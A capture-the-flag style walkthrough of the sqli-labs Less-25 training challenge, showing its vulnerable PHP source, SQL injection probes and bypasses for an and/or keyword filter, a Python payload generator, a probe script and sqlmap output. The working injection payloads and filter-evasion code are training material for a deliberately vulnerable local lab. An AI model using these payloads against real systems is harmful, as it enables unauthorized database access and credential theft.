sqli-lab-less25
I. Target
Less-25 GET-Error based-All your OR&AND belong to us-string single quote
# Error-based; the words "and" and "or" are filtered
http://127.0.0.1/sqli/less-25/
II. Vulnerability probing
http://127.0.0.1/sqli/Less-25/index.php?id=1'
# You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
# Hint: Your Input is Filtered with following result: 1'
# The error exposes the fragment '1'' LIMIT 0,1, so the id value is wrapped in single quotes
# Inferred query: select * from users where id='$id' limit 0,1;
http://127.0.0.1/sqli/Less-25/index.php?id=1' and 1=1
# Hint: Your Input is Filtered with following result: 1' 1=1
# The word "and" has been stripped from the echoed input: and/or are filtered
III. Source analysis
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);
//fiddling with comments
$id= blacklist($id);
//echo "<br>";
//echo $id;
//echo "<br>";
$hint=$id;
// connectivity
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
echo "<font size='5' color= '#99FF00'>";
echo 'Your Login name:'. $row['username'];
echo "<br>";
echo 'Your Password:' .$row['password'];
echo "</font>";
}
else
{
echo '<font color= "#FFFF00">';
print_r(mysql_error());
echo "</font>";
}
}
else
{
echo "Please input the ID as parameter with numeric value";
}
function blacklist($id)
{
$id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive)
$id= preg_replace('/AND/i',"", $id); //Strip out AND (non case sensitive)
// `/or/i` is the regex pattern:
// - `/` delimits the pattern (start and end).
// - `or` is the literal to match: the letter "o" followed by the letter "r".
// - `i` is a modifier: match case-insensitively.
return $id;
}
?>
IV. Black-box and white-box testing
1. Basics for bypassing a filter that removes and/or
(1) MySQL keywords are case-insensitive: AND, and and aNd are the same keyword
(2) Hex literals (0x...) are understood by MySQL in place of string values; URL encoding, by contrast, is decoded by the web server/PHP before the value reaches the filter, not by MySQL
(3) Equivalent operators: and can be written as &&, or as || (MySQL treats || as OR unless PIPES_AS_CONCAT is enabled)
(4) Inline comments /*! ... */ and multi-line comments /* ... */
2. Bypass strategies
(1) Case variation
Or, OR, oR, And, ANd, AND, etc.
$id= preg_replace('/or/i',"", $id)
$id= preg_replace('/AND/i',"", $id);
// - `i` is the case-insensitive modifier, so every case variant is stripped and this approach fails here
(2) Comment bypass
http://127.0.0.1/sqli/Less-25/?id=-1' a/*!*/nd 1=1 --+
# Hint: Your Input is Filtered with following result: -1' a/*!*/nd 1=1 --
# Fails
http://127.0.0.1/sqli/Less-25/?id=-1' a/**/nd 1=1 --+
# Hint: Your Input is Filtered with following result: -1' a/**/nd 1=1 --
# Also fails: the filter does not touch it, but MySQL treats a comment as a token separator, so a/**/nd is read as two identifiers rather than the keyword
(3) Double-write bypass
http://127.0.0.1/sqli/Less-25/?id=-1' aandnd 1=1 --+
# Hint: Your Input is Filtered with following result: -1' and 1=1 --
# Succeeds: the filter removes the inner "and" in its single pass and the surrounding a...nd closes up into "and"
(4) Operator-symbol bypass
http://127.0.0.1/sqli/Less-25/?id=-1' && 1=1 --+
# Hint: Your Input is Filtered with following result: -1'
# Fails, but not because of the blacklist: & separates query-string parameters, so PHP sees id=-1' and the rest is lost. Send it URL-encoded as %26%26 instead
http://127.0.0.1/sqli/Less-25/?id=-1' || 1=1 --+
# Hint: Your Input is Filtered with following result: -1' || 1=1 --
# Succeeds
(5) Encoding bypass
URL encoding
http://127.0.0.1/sqli/Less-25/?id=-1' and 1=1 --+
http://127.0.0.1/sqli/Less-25/?id=-1'%20and%201=1%20--+
# Hint: Your Input is Filtered with following result: -1' 1=1 --
# Fails: PHP decodes %20 before blacklist() runs, so the filter sees the plain keyword
Hex encoding
# Hex literals cannot simply be concatenated like this
http://127.0.0.1/sqli/Less-25/?id=0x2d0x310x270x200x610x6e0x640x200x310x3d0x310x200x2d0x2d0x2b
# Hint: Your Input is Filtered with following result: 0x2d0x310x270x200x610x6e0x640x200x310x3d0x310x200x2d0x2d0x2b
# Not a bypass: the value stays inside the quotes (WHERE id='0x2d0x31...'), so MySQL compares it as an ordinary string, no row matches and nothing is shown. A hex literal can only stand in for a string value once the query has already been broken out of (for example in a UNION SELECT); it can never replace a keyword such as and/or
(6) UNION query bypass
# Instead of and/or-based error injection, use a UNION query (or UNION-based error injection), which needs neither keyword
http://127.0.0.1/sqli/Less-25/?id=-1' union select 1,2,3 --+
# Hint: Your Input is Filtered with following result: -1' union select 1,2,3 --
ps: points to watch
The filter also eats "or"/"and" inside identifiers and function names needed when dumping: information_schema contains "or", floor() contains "or", rand() contains "and", order by contains "or", and so do column names such as password. Double-write these too (infoorrmation_schema, flooorr, raandnd, passwoorrd).
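The following Python is an added example, not code from the original writeup or from sqli-labs. It re-implements the Less-25 blacklist() from the source above, mimics how PHP parses the query string (which is why a raw && truncates the id parameter), builds the inferred query, and generates double-written payloads that survive the filter, including for identifiers such as information_schema, floor() and rand(). All sample payloads are constructed here; the users table and query shape are the ones inferred in section II.

```python
import re
from urllib.parse import parse_qs

# Re-implementation of blacklist() from the Less-25 source: one case-insensitive,
# non-overlapping pass that strips "or", then a second pass that strips "and".
_OR = re.compile(r"or", re.I)
_AND = re.compile(r"and", re.I)


def blacklist(value: str) -> str:
    return _AND.sub("", _OR.sub("", value))


def build_query(id_value: str) -> str:
    # The injectable query the PHP page builds after filtering (kept vulnerable
    # on purpose: it mirrors the page under test).
    return f"SELECT * FROM users WHERE id='{id_value}' LIMIT 0,1"


def server_view(query_string: str) -> dict:
    # What PHP ends up with for a raw query string: split on '&', URL-decode
    # ('+' becomes a space), run the blacklist, then build the SQL.
    # A raw '&&' therefore cuts the id parameter short, while %26%26 survives.
    raw = parse_qs(query_string).get("id", [""])[0]
    filtered = blacklist(raw)
    return {"raw": raw, "id": filtered, "sql": build_query(filtered)}


_KEYWORD = re.compile(r"or|and", re.I)


def double_write(payload: str) -> str:
    # Rewrite every "or"/"and", whether it is an operator or sits inside an
    # identifier (information_schema, password, floor(), rand(), order by),
    # as first-char + keyword + rest: or -> oorr, and -> aandnd. The filter's
    # single pass removes the inner copy and the outer characters close up
    # into the original keyword.
    rewritten = _KEYWORD.sub(lambda m: m[0][0] + m[0] + m[0][1:], payload)
    # Check the round trip against the simulated filter before sending it.
    if blacklist(rewritten) != payload:
        raise ValueError(f"double-write does not survive the filter: {rewritten!r}")
    return rewritten


if __name__ == "__main__":
    # Constructed sample payloads matching the probes in the writeup above.
    for p in ["-1' and 1=1 -- ", "-1' aandnd 1=1 -- ", "-1' || 1=1 -- ",
              double_write("-1' and 1=1 -- "), double_write("floor(rand(0)*2)"),
              double_write("information_schema.tables")]:
        print(f"{p!r:45} -> {blacklist(p)!r}")
    print(server_view("id=-1' && 1=1 --+")["sql"])         # id truncated at '&'
    print(server_view("id=-1' %26%26 1=1 --+")["sql"])     # && reaches MySQL
    print(server_view("id=-1'%20and%201=1%20--+")["sql"])  # decoded, then filtered
```

double_write() is deliberately strict: it re-runs the simulated filter on its own output and raises if the keyword would not reassemble, so a payload is only ever sent once it is known to survive a single-pass strip-out.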
V. Writing a script
import requests

url = "http://127.0.0.1/sqli/less-25/index.php"
# Copy the browser's request headers (F12) or capture them with Burp Suite
header = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36',
    'Accept-Language': 'en-US,en;q=0.9',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7'
}
# Probe payload id=-1'-- ; passing it through params lets requests URL-encode the
# quote and the trailing space (sent as '+', decoded back to a space by PHP)
payload = "-1'-- "
response = requests.get(url, params={'id': payload}, headers=header)
print(response.text)
# Judge the result from the echoed output (the Hint line shows the filtered id)
VI. sqlmap
sqlmap -u "http://127.0.0.1/sqli/Less-25/?id=1" --batch
Parameter: id (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=1' RLIKE (SELECT (CASE WHEN (9223=9223) THEN 1 ELSE 0x28 END))-- uwXx
Type: time-based blind
Title: MySQL >= 5.0.12 RLIKE time-based blind
Payload: id=1' RLIKE SLEEP(5)-- Necj
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: id=-1640' UNION ALL SELECT NULL,NULL,CONCAT(0x717a7a6a71,0x7867436271774d577a656d554a44766b496f7149784d45636b6e594a6b6679494f42506c6e425562,0x716a7a7a71)#
VII. Summary
1. Ways to get past the and/or filter
Inline and multi-line comments (do not work here: MySQL reads a comment inside a keyword as a separator)
Double-writing (works)
Case variation (does not work against a case-insensitive filter)
Operator symbols && and || (work; && must be sent URL-encoded as %26%26)
Encoding (URL encoding does not work because PHP decodes it before the filter; hex only substitutes string values, not keywords)
UNION queries (work, since they need neither keyword)
2. When dumping, watch for identifiers that themselves contain or/and (information_schema, floor, rand, order by, password) and double-write them as well